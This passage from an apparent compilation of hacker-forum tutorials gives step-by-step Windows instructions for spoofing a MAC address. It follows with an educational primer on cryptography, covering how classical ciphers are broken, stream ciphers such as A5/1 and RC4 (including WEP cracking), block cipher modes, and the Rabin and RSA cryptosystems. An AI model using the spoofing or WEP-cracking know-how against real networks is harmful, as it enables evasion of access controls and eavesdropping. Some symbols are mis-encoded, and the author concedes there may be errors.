be different, however, the MAC wont.
Implementing a spoofed MAC

This can be dangerous and I take not responsibility for damage to network cards etc etc if your NIC
decides to fry, blow up and/or screw your girlfriend i take no responsibility.
Firstly disconnect yourself from the network as its morally wrong to do this whilst connected.
Go to your "Network Connections" menu. Here the network cards are displayed as icons.
Page 26
Right click the icon you want to change and click "properties"
Select "Configure"
Go to the Advanced tab
Scroll down and find "Network Address" in the list box
To the right select the option button and input your own custom MAC address.
Launch a command prompt window and type "IPConfig /all" and check to see if the MAC has
changed.
For you IT support lads out there you can find out a remote end users MAC address by using the
command prompt line "GETMAC" (see previous chapters).
As i said earlier.... quick, cheap and dirty... there are alternative methods such as registry hacks etc
but thats not so quick and dirty.
Page 27
Cryptography
A little about Cryptography
Author: Yuip
There's lots of threads on this forum about cryptography etc. but none of them are particularly
comprehensive (or, if I'm brutally honest, particularly correct) so I thought I'd write something
about it. There are likely loads of errors below, but it's too long for me to re-read and check! Once
again it's rather too long, so I had to divide it into two posts for the sake of the forum software.
This will be divided into roughly four sections, each getting more mathematical. The first section
will be on some basic (i.e. classical) ciphers, which you'll most likely know most of. I will
emphasize how to break these more than anything else. The next section will include an outline of
the more modern approach to cryptography, and the third section will of course talk about RSA (and
friends). The final section will close with some final thoughts, and also roughly how to break d4de's
'Closecrypt Encryption System v1.0' in 3 easy steps.
If you have trouble following the math, do ask me to explain. (You may also want to brush up on
your math if this is the case - else you'll be stuck forever in noob-dom.) I've kept the math as simple
as possible in the first few sections. In addition, I will not go into detail in all parts, since I don't
know what people are interested in. If anyone is interested in more technical depth, let me know and
I'll add that in.
Finally some simple terminology: plaintext refers to the message we want to send, unencrypted.
Ciphertext refers to encrypted plaintext.
Classical Crytography - Stupidity, Substitution,

Transposition, Overconfidence
In this section we will cover some classical ciphers, and show how they are broken. Since this is
Very Basic Stuff, I'll not go into great detail, as you can read loads about this anywhere, and you
probably know it all anyway.
We'll start with 'Stupidity', more commonly known as the Caesar cipher. You'll almost surely know
how this works. We simply pick a number from 1 to 25 and shift each letter of our plaintext this
many along (looping round if necessary). So if we were to encrypt the plaintext 'SECRET' with the
number 6 then S would go to Y, E would go to K etc. giving the ciphertext 'YKIXKZ'. To decrypt,
we simply shift the letters back 6. If we don't know the magic number, then we can't do this.
This is probably the simplest cipher possible. And it is really stupid. As the attacker we just need to
figure out the number that is being used. Since there are only 25 possibilities, given a ciphertext,
there are only 25 possible plaintexts. Chances are only one of them will make any sense, so we can
Page 28
just try all 25. So really this cipher is completely useless. But we probably already knew that.
However it's useful to keep this cipher in mind, even if it is very simple, as it demonstrates the
basics concepts we will deal with. In particular we can understand the general form all encryption
schemes take. We have a function into which we feed a plaintext and a key (in this case a number
from 1 to 25) and it returns a ciphertext. To decrypt we have a function that takes a ciphertext and a
key and returns the plaintext. The key is kept secret from the attacker, so in theory he can't decrypt
the message. We'll talk about this general setup more later.
So what is is that makes this cipher so useless? The problem is the possible keys are very small in
number, so we can just try them all. This may seem like an obvious problem and something that can
easily be avoided, but as we'll see later DES actually suffered from the same problem.
So now we'll move on to a much better cipher: the substitution cipher. Again you very likely know
this one - we choose a permutation of the alphabet, and each letter is substituted for another
according to this permutation. So for example we might write something like:
Code:
Plaintext: ABCDEFGHIJKLMNOPQRSTUVWXYZ
Ciphertext: REWQTYUIOPASDFGHJKLZXCVBNM
Here the permutation we have chosen is REWQTYUIOPASDFGHJKLZXCVBNM, and so given

our plaintext we replace all occurrences of the letter A with R, B with E, C with W etc. so 'SECRET'
would become 'LTWKTZ'. To decrypt we just need to know the permutation used. So we can
understand the permutation chosen is the key for the encryption system. Already this is a far
superior cipher - there are 26! possible keys. So a bruteforce test of all possible keys is out of the
question. So are we safe? No. The cipher replaces each letter with another in a random way (which
provides some 'confusion' as we shall talk about later) but it still preserves a lot of the structure of
the plaintext (provides no 'diffusion') - in particular the same letter is always encrypted the same
way. So just looking at 'LTWKTZ' I immediately see that there are two letters the same. This may
not seem like much information, but if the message sent is a long message, then we can gain more
information. So let's assume we have a really long message (several pages) that we have intercepted
as an attacker. We can look for the most commonly occurring letter. Now if we know the language
the plaintext is in, we can guess this is probably the letter 'E'. Similarly we can look for pairs of
letters that appear together. The most common is 'TH'. Similarly, the most common triple of letters
in English is 'THE'. Similarly 'T' and 'A' are the next most common letters after 'E'. Then we simply
do some of these substitutions and look at what we get. We may then see certain patterns that we
can guess, for example say we saw had the phrase 'thetXFe', (where lowercase letters are our
guesses, and uppercase letters are the yet to be guessed substitutions) then we may guess X = i, F =
m. As we guess more letters it becomes easier to fill in the remaining letters. You can find a good
example of this in action on the Wikipedia page on Frequency Analysis. With some simple
computer software this can be done very rapidly.
Of course there is a problem here - it is possible to write plaintext with deliberately skewed
frequency distributions of letters (for example write your message without using the letter 'E') but
this is not an ideal solution! So in fact, despite the large number of keys, this cipher is pretty useless
too - it preserves far too much of the statistical structure of the plaintext.
Page 29
So onto the next idea: transposition. Instead of replacing letters with other letters, we simply reorder
the letters. There are many ways to do this. One common way is to divide up our plaintext into
same length sections, write the sections below each other, and write out each column according to
some permutation. So for example if we had the plaintext: 'ATTACK AT DAWN' we might divide it
into sections of length 4:
Code:
ATTA
CKAT
DAWN
then we choose a permutation such as 1423, so we write out the first column, followed by the fourth
column etc. to get 'ACDATNTKATAW' as our cipher text.
We have potentially quite a lot of keys here, especially if we divide it into longer sections. So are
we safe? No. Clearly all you need to do to break this cipher is to be half decent at anagrams. Once
you've cracked a little bit of the transposition, you know that the same transposition is applied
repeatedly, so you have broken the cipher. This means that you can choose any bit of the cipher text
to try and anagram with, which shouldn't be too hard.
So what's the point of this cipher? Normally we combine this cipher with other techniques such as
substitution to make things more complicated. In fact if we substitute, then transpose, we have a
much trickier cipher to break - frequency analysis is harder to use as the transposition means plain
text will not be revealed and easily guessable, and anagramming won't work because of the
substitution. In fact many modern block ciphers use a (much more complex and advanced) form of
this idea.
Now we shall mention the Vigenere cipher. This is a fun cipher since it appears to beginners to be
unbreakable (so they often use it). It's a simple polyalphabetic cipher. We choose a key as for the
Caesar shift cipher, but instead we choose several numbers. So for example we might choose
7,14,2,23 as our key. Then we shift the first letter of our plaintext along 7, the second along 14, the
third along 2, the fourth along 23, then the fifth along 7 again, etc. One immediate advantage of this
is that the same letters in plaintext aren't necessarily substituted with the same letter in cipher text.
Similarly if we see two letters the same in the ciphertext, they may be different letters in plaintext.
So encrypting 'SECRET' with the above key we get 'ZSEOLH' - no repeated letters. This means
frequency analysis will not work. However it is still broken. Imagine we know the length of the key
(4 in this case). The we can divide up the ciphertext into four parts corresponding to each part of the
key. Then these bits are just Caesar shift ciphers - we can use frequency analysis to guess the shift
of each one. Bearing in mind that the key is often represented as a word for ease of memory (for
example 'YUIP' would be the key 25,21,9,16) we can also use this to help guess the key (indeed we
will assume the key is chosen this way when we discuss the running key variant below). So how do
we get the length of the key?
Page 30
In a large block of plaintext, the word 'THE' will probably come up many times. In particular there
may be times when the 'T' of some of them line up at the same point of the key, so will, by chance,
be encrypted using the same key letters, giving repeated groups of text in the ciphertext. So here is
an example (borrowed from Wikipedia, since I can't be bothered to contrive one myself):
Code:
Ciphertext: DYDUXRMHTVDVNQDQNWDYDUXRMHARTJGWNQD
We see that DYDUXRMH is repeated, and the distance between them is 18. So assuming that they
represent the same plaintext, the key length divides 18: so it is 18, 9, 6, 3, or 2. Further NQD is
repeated, and the distance is 20 characters. So the key length also divides 20. Thus the only
possibility is 2. I'll leave it to you to do the rest.
Vigenere Cipher
The Vigenere cipher is actually very important because it is related in many ways to stream ciphers,
which we shall discuss later. However one variant we will need to know about is the 'running key'
variant. Clearly a way to improve the Vigenere cipher would be to have a key as long as the
message. So for example, if we used a large block of our favorite piece of literature as the key, then
it would of course never repeat, so would appear to be unbreakable. For those of you that know
about One Time Pads, this is exactly the same, except that the key is not random, but rather a block
of text from a book, agreed beforehand.
However, perhaps a little surprisingly, despite it being almost a One Time Pad, the security is
usually quite poor. We can guess some probably text that is in the message or in the running key
(for example a name or a location we might expect to be communicated). Then we simply run along
the ciphertext, subtracting out our guess at each point. Eventually we'll get something intelligible
(assuming our guessed text does indeed appear somewhere in the ciphertext or in the running key).
Then it is likely that our guess is indeed part of either the plaintext or the running key at that point.
We can normally extend this chunk of intelligible text at either end, providing us with more
plaintext, which in turn can be extended, until we either get the whole message like this, or
recognize the running key used. The problem here is that the entropy of both the plaintext and the
key is low - essentially we can guess some of the text in the key and the plaintext, and extend from
that. This is of course why this is not a problem for One Time Pads (see below) since there the key
has high entropy, so we can't guess the key and we've no idea when our plaintext guess is correct.
In addition, the key space for the running key cipher isn't really that big - if the attacker has a large
collection of texts you are likely to use then it may not take that long to try them all with a modern
and powerful computer.
And so we reach the end of this relatively easy section. There are many other classical ciphers and it
may be worth looking up some and thinking how you might go about breaking them. We may not
have learnt any new or exciting ciphers, but we have seen some of the pitfalls that classical
cryptography suffered from, as well as seen some ideas to make stronger ciphers.
Page 31
Modern Cryptography - Formalizing, Types of
Attack, Perfect Secrecy
So now we've seen some classical ciphers and played with them a bit, we can take a break and be a
little more abstract. This will allow us to develop a more rigorous understanding of what is involved
in cryptography.
So what is an encryption system? Well we've already talked about this - it is a function that takes
plaintexts and keys to ciphertexts, as well as providing an inverse decryption function that takes
keys and ciphertexts to plaintexts. In particular, one obvious observation: if we fix the key, then
different plaintexts must give different ciphertexts, and vice versa.
What do we want our system to do? Obviously if the attacker is given the ciphertext, we want it to
be impossible for him to deduce the plaintext. However we may require more security - for example
say that the attacker knows some of our plaintext - can he use this to figure out the rest? In the
Vigenere cipher for example, if the attacker knows some plaintext, then he can deduce part or all of
the key. This is called a known plaintext attack. Other examples might include a chosen plaintext
attack - where the attacker can choose plaintext to encrypt with your key and observe the ciphertext
output, although the attacker may not know the key to decrypt it (one obvious example where this
attack is possible is public key cryptography). This may give him extra information about the key.
So what would 'perfect secrecy' mean? We want our encryption system to withstand all possible
attacks - known plaintext, known ciphertext etc. We can phrase this more rigorously by saying that
no matter how much information the attacker has, he can gain no more. So even if he knows a large
part of the key, and some known plaintext, and can encrypt as much chosen plaintext as he likes, he
can't deduce anything else about the message sent. Equivalently, the ciphertext gives absolutely no
additional information about the plaintext. We can phrase this mathematically by saying that the
conditional entropy of the plaintext given the ciphertext is the same as the entropy of the plaintext.
This definition of perfect secrecy is due to Claude Shannon (the founder of modern information
theory).
So is it possible to create perfect secrecy? Yes. I've already mentioned the One Time Pad. It has
several implementations, but the most common way beginners think about it is as a Vigenere cipher
where the key is completely random and as long as the ciphertext. Furthermore the same key is
never reused. It is fairly easy to see why this is perfectly secure - if the key is truly random then
given a ciphertext, any plaintext of the same length is possible depending on the key. Of course the
problem with this is that it is very inconvenient - we have to first generate a truly random key. Then
we have to distribute it securely to our agents, without it falling into enemy hands. They have to
have a large enough key to allow them to send all the messages they will want to send, and not
reuse the key. They also need a way to dispose of the key once used so it never falls into enemy
hands. It is for this reason the One Time Pad is rarely used in practice. One particular problem
(indeed a problem with all stream ciphers) is that it is easily broken if the key is reused.
Mathematically Speaking
I'm afraid modern cryptography does have a substantial math component. I've gone about as far as I
can without using any math, but now I'm going to have to rephrase what we've said already in a
Page 32
more mathematical way. As I've said though you'll be stuck in noob-land forever if you hate math,
so get learning.
Okay, from now on we'll be working in a more computer friendly way. In the English alphabet we
have 26 letters. When working with computers we normally think in binary, which is what we shall
do now. So from now on a plaintext will be a string of 0s and 1s. How this is encoded is irrelevant
(so for example we might convert letters to ASCII codes, then to binary) it just makes things easier
to phrase mathematically.
So in the most general mathematical sense we say our alphabet consists of the symbols {0, 1} and
our texts are simply all finite strings of symbols in our alphabet. Then an encryption function takes
a plaintext from our space of texts and a key and gives a corresponding ciphertext in our space of
texts (and no two plaintexts give the same ciphertext - the function is injective). If you don't like
this formalism, don't worry, things are actually fairly intuitive.
So we can consider the One Time Pad in this way - the key is a random sequence of 0s and 1s,
which we XOR (Exclusive OR) with the plaintext, to get the ciphertext. Although this is technically
a different implementation from the above, it is essentially equivalent - we just have an alphabet
with two letters. So we can give an example. Say I want to send a message 0111110001100010 to
my friend, using the one time pad 0100010100101001110111011100011101001101101111, then I
will XOR 0 with 0 to get 0, 1 with 1 to get 0, 1 with 0 to get 0 etc. to get the ciphertext:
0011100101001011. The advantage of this way of phrasing things, and using XOR, is that it makes
everything simple - to decrypt I also XOR the ciphertext with the key.
So why can't we reuse our one time pad from the start for a second message? Well, lets explore the
properties of XOR:
Code:
0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0
We note two things. Firstly 0 XOR 1 is the same as 1 XOR 0. This is a property known as
commutativity - it doesn't matter which was round we do our operation. For example addition and
multiplication are commutative operations: 2 + 3 = 3 + 2. However subtraction is not: 2 - 3 != 3 - 2.
So if for example we did 0 XOR 1 XOR 0, then we can swap the first two arguments, so it is equal
to 1 XOR 0 XOR 0. We know 0 XOR 0 = 0, so we just get 1. Before the 'bears' point out that I'm
also assuming associativity here, yes I am. If this appears confusing, we can think of XOR in a
much better way - modular arithmetic. Most people here will know modular (or sometimes clock)
arithmetic. So I won't explain it (maybe someone else can). Then XOR is simply addition modulo 2.
So in fact this complicated looking operation is actually just addition! ( 0 + 0 = 0, 0 + 1 = 1 + 0 = 1,
1 + 1 = 2 = 0 modulo 2) So actually all the standard properties of addition apply.
Page 33
So lets assume that we have two plaintexts, encrypted with the same random key. Let us assume
that the digits of the two plaintexts are p1,p2,p3,p4,.... and q1,q2,q3,q4,... and that the digits of the
key is k1,k2,k3,k4,... Then as explained to form the ciphertexts we simply add the key to each of the
plaintexts. So as the attacker, since they same part of the key has been used for both messages, we
can see p1+k1,p2+k2,p3+k3,p4+k4,... and q1+k1,q2+k2,q3+k3,q4+k4,... Since the key has been
reused if we now add together (XOR) the two ciphertexts, we get p1+2*k1+q1,p2+2*k2+q2,... etc.
But this is just addition modulo two - so 2*k1, 2*k2 etc is just 0. Or if you prefer, k1 XOR k1 is just
0. So in fact when we add together the ciphertexts we are getting p1+q1,p2+q2,p3+q3,p4+q4,... But
this is just the message p1,p2,p3,p4,... encrypted with a key of q1,q2,q3,q4,... - which is exactly the
running key cipher (since we are using a piece of plaintext as a key) - so suddenly we can decrypt
our message as explained before. Now might be a good time to go back to the first implementation
of the one time pad (where we weren't working in binary) and figure out how this attack applies
there.
Now that's all I'm going to say about the One Time Pad. Well, that's not entirely true - later when we
talk about RSA I will highlight some more problems with it.
Practical Ciphers - Stream Ciphers

So we've already discussed why the One Time Pad is completely impractical. Can we use the ideas
of the Vigenere cipher, the running key cipher and the one time pad to make a practical yet secure
cipher? Yes (or at least it appears so).
So the Vigenere cipher didn't work since our key repeated. The running key cipher didn't work since
the key didn't have enough entropy. The one time pad was perfect, but the key was impractical to
use. What if we could take a shorter key, and 'stretch' the entropy out to make a longer,
pseudorandom key? Although the key wouldn't be truly random, it may be very difficult for the
attacker to figure out how to predict what it looks like.
This is the principle behind Cryptographically Secure Pseudo Random Number Generators (or
CSPRNG for short). For the moment lets forget about cryptographically secure and just think about
random number generators.
Normally a random number generator takes an initial bit of entropy (called the seed) and uses that
to generate a seemingly random sequence, much longer than the seed. The important point is that if
we know the seed, the same sequence will be generated. So say we provide a seed of 110011. A
random number generator might generate 101101 011110 110011. What it has done is put the outer
two digits of the seed into the middle of the middle four digits (so 1 and 1 go in the middle of
1001). Then it does the same thing on what it just output. Then it does it again. This is an extremely
rubbish random number generator. The important bit to note however is that is repeats - the third
block is just the seed. So if we continued to generate output then we would get the same three
blocks over and over. This is a property true of all pseudo random number generators. We can
justify this mathematically, but I won't do that here (maybe in the last section). So one thing we are
interested in is the size of the period of the generator. Here we can see it is always going to be three
blocks before it starts to repeat. The longer the period the more the random number 'stretches' the
entropy of the seed.
Page 34
Now a cryptographically secure generator is one that is suited for cryptography. In particular it must
have two properties: firstly if some output is known, it is not easy to guess the next bit with good
probability (i.e. we cant use a polynomial time algorithm to guess it), and secondly, if at some point
the state of the system becomes compromised, we can't recover previous bits of the output. So in
our above stupid example, since the next block of numbers only depends on the previous block, if
we knew the previous block we can guess the next block.
So why is this necessary for cryptographic security? Well imagine we were using a poor RNG to
generate a key. If the attacker knew some of the plaintext (so a known plaintext attack) then he
could XOR it with the ciphertext to recover a portion of the key. He could then use this to predict
the output of the random number generator after that point in the key, and thus recover the rest of
the message. If he can do this efficiently he can just guess likely plaintexts.
This is the challenge at the heart of stream ciphers. Their operation is simple - use an initial key as
your seed, and a CSPRNG to generate output with a long period and use that as your one time pad
key. Of course since this is not truly random we don't have perfect secrecy, but a well designed
CSPRNG can provide practical secrecy, since it may be very hard (think as hard as factorizing large
integers as in RSA) to predict the output of the RNG. As also explained we need a sufficiently large
period for the RNG, so that the key won't repeat itself as in the Vigenere cipher.
A Real Stream Cipher

Okay so all this theory is all very well, but what does a real stream cipher look like? Well the
answer is it's rather complicated. So we will give a very simple stream cipher that is used in
practice, though not for cryptographic purposes (at least not securely!). Things will get a tiny bit
mathematical now.
We need to understand the Linear Feedback Shift Register (LFSR) first. This is a very simple way
to generate reasonably random looking output. an LFSR consists of an initial state, and some 'taps'.
The taps are the bits that will influence the next bit output. So for example say I have the starting
state of 4 bits: 0001. And I have chosen taps 3 and 4. Then this means that I take the 3rd bit and the
4th bit (0 and 1 respectively) and I XOR them, to get 1. Then I output 1. Then I replace the 4th bit
with the 3rd bit, the 3rd bit with the 2nd bit, the 2nd bit with the first bit, the first bit with the
number output (effectively shifting everything along and putting my output on the end) updating my
current state to 1000. Then I repeat this, XORing the 3rd and 4th bit to get 0, output this, then
update my current state to 0100. And I keep repeating this. So I get:
Code:
current LFSR state: output:
0001 1
1000 0
0100 0
0010 1
1001 1
1100 0
Page 35
0110 1
...
We should be able to see why this is called a feedback shift register - we shift everything along and
feed the number output into the end. It is linear since the output is a linear function of the current
state. We can immediately see therefore that the future output depends on the last four bits of
output, so clearly this is not cryptographically secure if we know the taps. So why have I mentioned
it? Well LFSRs are simple - being linear means we can easily understand them mathematically. For
example we know how big their periods can be, as well as their weaknesses. Secondly they are very
simply to implement in hardware, as a result they crop up a lot in the real world since they are
cheap to make.
Now if you are clever you may be thinking they could be cryptographically secure if we kept the tap
sequence secret - since then we don't know how to generate the next output even if we know the
current state. Well you'd be thinking the correct way, but you'd also be wrong. Using the
Berlekamp-Massey algorithm we can find the shortest LFSR for a given output sequence quite
easily.
But despite this, as I've said LFSRs can be and are used as PRNGs. Although used on their own for
stream ciphers they are insecure they can be combined in certain ways to create more secure stream
ciphers. Let us give a very real example of a use of LFSRs to create a stream cipher: A5/1.
Cellular Telephones - A5/1

A5/1 is an LFSR based stream cipher that is used in your cellphone to protect your privacy. You
can't get a more real world use than that!
So how does it work? We start with a 64-bit key, together with a 22-bit frame number (that is
publicly known). We then have three LFSRs. The first LFSR has length 19 bits, and tap sequence
13,16,17,18. The second LFSR has length 22 bits and tap sequence 20,21. The third LFSR has
length 23bits and tap sequence 7,20,21,22. The output of these three LFSRs will be XORed.
Initially all three registers are set to 0. Then for 64 cycles, the 64-bit secret key is mixed in to the
stream in a certain way: the first bit of the key is XORed to the least significant bit of each LFSR,
then the registers are clocked. Then the second bit is XORed to the least significant bit of each
register and it is clocked again. This continues till we have clocked the registers 64 times. Then the
22-bit frame number is mixed in the same way. Then it is clocked 100 times and the output
discarded. Then the cipher is ready to produce some keystream output.
Now if you have understood this you should see that it's not that strong. That's because I forgot a
final point - not all the LFSRs are clocked together - each cycle the register is either clocked, or
stays the same and outputs the same number as before. Whether or not a register is clocked depends
on its 'clocking bit' - for registers 2 and 3 the clocking bit is bit number 10, for the first register it is
bit number 8. So at each stage these three bits of the registers are compared. The majority bit (the
more common bit of 0 and 1 in these three bits) is determined, and a register is clocked if the
Page 36
clocking bit agrees with the majority bit. So for example if bit 8 of register 1 was '0' and bits 10 of
registers 2 and 3 were both '1' the majority bit is '1' and registers 2 and 3 only are clocked that cycle.
This makes things a little more complex and a little more tricky.
Now it may interest you to know that A5/1 is more or less broken. A practical attack is still being
developed (although it would be reasonable if you thought that government agencies have already
developed one), but it just involves building a very large lookup table so is just a matter of time.
It may also interest you to learn that A5/2 - the predecessor of A5/1 - is very broken. This is perhaps
not suprising as it was created with input from government agencies (ostensibly for export
restriction purposes).
CSPRNGs and Secure Stream Ciphers

So what really secure stream ciphers can we develop? As we've mentioned it really depends on the
CSPRNG we are using. One possibility is to use a really secure CSPRNG such as Blum Blum Shub
- this has a strong number theoretic proof to show that it is as difficult to break as factorizing large
numbers (we shall see more of this later). This has the disadvantage however that implementations
are slow and not ideal for a lot of applications.
There are also other good stream ciphers. One very popular one you may wish to read about is RC4
- this is the most widely-used software stream cipher. In particular it is used in SSL, as well as WEP
and WPA. It is now considered a little flawed and not recommended for use in new applications.
The first few bits of the keystream are strongly non-random and leak information about the key. If
RC4 is poorly used, this can be used to recover the key (The Fluhrer, Mantin, Shamir Attack) - most
famously used to break WEP. This is an interesting (and not actually too hard) exercise for the
reader who has found everything rather simple so far - write your own WEP decryption program
(you may also want to implement Klein's Attack if you enjoy that).
Another way to generate a random keystream is to use a secure block cipher in counter mode (see
below). Then of course our stream cipher is as secure as our block cipher. This can be a useful way
of increasing our confidence in our encryption system - if we have a block cipher we trust, we can
turn it into a stream cipher that we can also trust.
Block Ciphers
So a block cipher is a symmetric key cipher (meaning the same key is used for both encryption and
decryption) which operates on fixed length groups of bits - blocks. So for example a block cipher
may take a 128-bit block of plainstext and give a 128-bit block of ciphertext.
We should already see a problem here - how do we encrypt messages longer than 128-bits (without
being susceptible to a statistical attack)? The answer is to use a mode of operation. We'll talk about
them in a minute.
So what does a block cipher look like? In generality, like before, given a key, it is simply a bijective
Page 37
function on the set of blocks (there are obviously (2^n)! such functions).
Most block ciphers work by repeatedly applying a simpler function. As we mentioned earlier this
can involve repeatedly substituting and permuting. As we've discussed neither of these operations
are secure on their own, but together, in sufficiently long chains, they can provide both 'confusion'
and 'diffusion' (which we shall talk about later). A cipher using only substitutions (S-boxes) and
permutations (P-boxes) is called an SP-network. A special class if ciphers are Feistel networks,
which you should know all about.
I won't detail the exact construction of block ciphers, as that's not very enlightening, but later I will
talk about their construction as relating to Shannon's 'confusion and diffusion'.
So the other important aspect of a block cipher is the mode of operation. To see why we need to
consider this, we shall first look at the simplest mode of operation - the sort of mode we might use
if we are a bit naive: Electronic codebook (ECB). In this mode, the message is divided into blocks
and each block is encrypted separately. The obvious problem here is that identical plaintext blocks
are encrypted into identical ciphertext blocks, so this does not hide patterns well at all. This is
particularly problematic for example if we are encrypting an image. Furthermore, as we'll talk about
in the RSA section, this is trivially susceptible to a Replay Attack.
So another more secure mode would be CBC - Cipher-block chaining. This is simple - each block
of plaintext is added (XORed) with the previous ciphertext block before being encrypted (we use a
random Initialization Vector to XOR with the first block). In this way each ciphertext block is
dependent on all plaintext blocks up to that point. This prevents the previous problem, but at the
cost of not being able to parallelize encryption (we can't encrypt a block until the previous block has
been encrypted).
Now there are other modes, but rather than go through them all, I'll mention just one more, one I
talked about earlier: Counter (CTR) mode. We mentioned this in the context of stream ciphers - that
is precisely what it does: turns a block cipher into a stream cipher. First we encrypt 0, then 1, then 2,
etc. and use the output as our keystream. This is essentially using the block cipher as a CSPRNG.
Obviously the period will be 2^n, which can be more than enough. Of course we'll also want to use
a 'nonce' to XOR with the numbers we are encrypting to avoid reuse of the keystream. The
advantage of this is we can easily parallelize the process.
So now we'll mention popular block ciphers. You will almost certainly know about DES - in many
ways the original block cipher. This has a colorful history, which I won't really talk about (visit a
library!), involving suspicions of backdoors and NSA involvement. You may have heard that DES is
insecure and should not be used - you'd be right. Although there are some theoretical attacks (three
publicly known) against DES they are not a concern in practice. The problem with DES is that it
has a 56-bit key length (it is know that IBM were persuaded to shorten it by the NSA) which means
a brute-force attack (simply trying all possible keys) is actually plausible. If you have the computing
power it's really quite fast. DES was improved with TDES - Triple DES - which simply does DES
three times (and so increases the key size). Despite being superseded by AES, TDES is still
extensively used in electronic payments so will be around for a while yet.
Page 38
So of course we have to mention AES - The Advanced Encryption Standard (as opposed to the Data
Encryption Standard). This is a standardized block cipher (Rijndael) used as an encryption standard
by the US government, amongst others. AES is an SP-network, not a Feistel network like DES.
AES has a fixed block size of 128 bits and key sizes of 128, 192 or 256 bits (technically AES is not
Rijndael as Rijndael supports larger block and key sizes). AES has a very neat algebraic description
which has caused some worry about the actual security of AES. AES is of course what you will
likely use to encrypt your hard drive.
Other common block ciphers include Blowfish, it's successor Twofish, and Serpent - the runner up
to Rijndael in the AES process (and in fact more secure, although slower).
So how do we attack block ciphers? Well I'm afraid it involves some math that most here probably
won't know. So we'll leave that for another time!
RSA and Friends

So now we know about block ciphers and stream ciphers where does RSA fit in? You will of course
know about RSA, and we shall discuss it properly here. There are many misconceptions about RSA,
and I'll point them out as we go along. The math may step up a level in this section as well - but I
can talk about the math here since it is more accessible that the corresponding stuff for block
ciphers etc. I will assume you are familiar with modular arithmetic (by which I mean you actually
know what modular arithmetic is - if you have just come across it in coding you probably don't!).
RSA is a public-key algorithm, as opposed to symmetric-key algorithms (being divided into stream
ciphers and block ciphers). In practice public-key algorithms are computationally difficult, so
normally your message will be encrypted using a symmetric-key algorithm like those already
discussed, and they secret key for that encrypted with a public-key algorithm. This is one of the first
misconceptions - a message encrypted with an RSA based scheme is not as strong as RSA; it is as
strong as the weakest encryption used (which may be some rubbish stream cipher!). In designing a
public key cryptosystem we are aiming for a high level of security - we want to be resistant to
chosen plaintext attacks (since if the attacker has the public key he can choose as much plaintext to
encrypt as he likes). In addition we want to overcome the difficulty of key exchange (which is a
major point of public key cryptography). Either way we want to have public key, which we share
with everyone and they use to encrypt messages to us, and a private key which only we have, and
without which it is impossible to decrypt messages encrypted with our public key.
The idea of public key cryptosystems is to base them on mathematical problems that are believed to
be hard. Two such problems we will consider are:
1 - Factoring. Let p,q be large primes - given N=pq, find p and q.

2 - Discrete logarithm. Let p be a large prime. Let g be a primitive root modulo p (i.e. a
multiplicative generator). Given x, find a such that x = gâ (mod p).
Page 39
It is important you understand the first of these. I will explain the second in more detail in the last
section.
The key point is that polynomial time algorithms (recap: an algorithm runs in polynomial time if
#operations < c(input size)^d for some constants c and d, or if you prefer you can use big O
notation) are not known for these two problems (whereas they are known for Primality testing for
example).
One method of solving problem 1 for example might involve trial division, but this requires
O(sqrt(N)) operations. The best known methods for both problems involve using a Factor Base
method called the Number Field Sieve. This has running time O(e^(((c log N)^1/3)(log log N)^2/3))
which, if you know what you are talking about, you might say is 'closer to polynomial time than
exponential time'.
Since factorization is such an important problem you may have heard of the RSA challenge
numbers - your chance to win lots of money for factorizing large numbers. An RSA number with
193 decimal digits was factored in 2005.
Okay, with this basic principles understood lets look at a public key cryptosystem. Since most
people who think they understand RSA don't, we'll start with a different system - the Rabin
Cryptosystem (don't worry too much if the math is a little tricky - you can still get the general idea).
This is a little less elegant than RSA, but easier to analyze mathematically.
The Rabin Cryptosystem

In the Rabin Cryptosystem, our private key consists of two large distinct primes, p and q, which are
equal to 3 modulo 4.
Our public key is simply N=pq.
Then our message can be a number from sqrt(N) all the way to N-1. To encrypt is simple - we
simply square m modulo N (this is why we need m greater than sqrt(N) else decryption is trivial!).
To decrypt we use a very basic mathematical fact:
Suppose p is a prime that is 3 modulo 4 (as is the case for the two primes in the Rabin
cryptosystem), say p = 4k-1. Then if x^2 = d modulo p has a solution for x, then x = d^k is a
solution (modulo p). This is clear since assuming d is non-zero, then x^(p-1) = 1 mod p (Fermat's
Little Theorem) that is: x^(4k-2) = 1, so d^(2k-1) = 1 and so d is a solution.
So given a message c = m^2, we can use this to find x1 and x2 such that x1^2 = c mod p, x2^2 = c
mod q. Via the Chinese Remainder Theorem we can find x such that x = x1 mod p, x = x2 mod q.
Page 40
Then of course x^2 = c mod N. Of course there will actually be four distinct possibilities for x, any
one of which could have been the original m. For this reason we would need to ensure messages
have enough redundancy so that only one solution makes sense. This is one of the reasons the Rabin
Cryptosystem, despite being in some ways 'stronger' than RSA, is not very common.
The particularly nice thing about Rabin is that we have the following theorem: Breaking the Rabin
cryptosystem is essentially as difficult as factoring N. We can see one way by noting that if we can
factor N we can get the secret key and decrypt as above. Conversely suppose we have an algorithm
for computing square roots mod N. Picking x at random we can use this to find a y such that x^2 =
y^2 modulo N. With probability 1/2 we have x != +/- y modulo N. Then clearly gcd(x-y, N) is a
non-trivial factor of N. After r trials the probability of failure is 1/2^r so this can be made arbitrarily
small.
Unfortunately this is not true for RSA - this is perhaps the biggest misconception about RSA - it is
not yet known if breaking RSA is as difficult as factorizing (and there's some evidence to suggest
that such a proof will never be found).
RSA in detail
So how does RSA work? If you already know then all the math should be easy for you.
We choose two large distinct primes, p and q and set N=pq.
Then we calculate phi(N) = (p-1)(q-1), so that if x is coprime (has no common factors with) to N
then x^(phi(N)) = 1 mod N. (Euler-Fermat Theorem)
Now we pick an integer e which is coprime to phi(N). Then we calculate its multiplicative inverse,
in other words find d such that de = 1 (mod phi(N)).
Then our public key is (N,e), and our private key is (N,d). To encrypt a message m (a number from
1 to N-1) we simply raise it to the power of e modulo N, so c = mê mod N. To decrypt this
message we simply raise c to the power of d modulo N. We check this works mathematically: c^d =
m^(ed) = m modulo N (by Euler-Fermat). There is a possibility m is not coprime to N, but this is
extremely unlikely so we ignore it.
So how strong is RSA? Clearly if we can factorize N we can recover d. In fact recovering the
private key (N,d) from the public key alone (N,e) is essentially as difficult as factoring N. This time
I am not going to prove this, since it is a little more mathematical than you may appreciate.
What is important is that this does not say that we can't break RSA another way, without knowledge
of the private key. Clearly this would involve, similar to the Rabin Cryptosystem, finding e-th roots
modulo N (as opposed to square roots in the Rabin Cryptosystem) in an efficient way. This is called
Page 41
the RSA problem, and is also believed to be hard (like factorization and the discrete logarithm). In
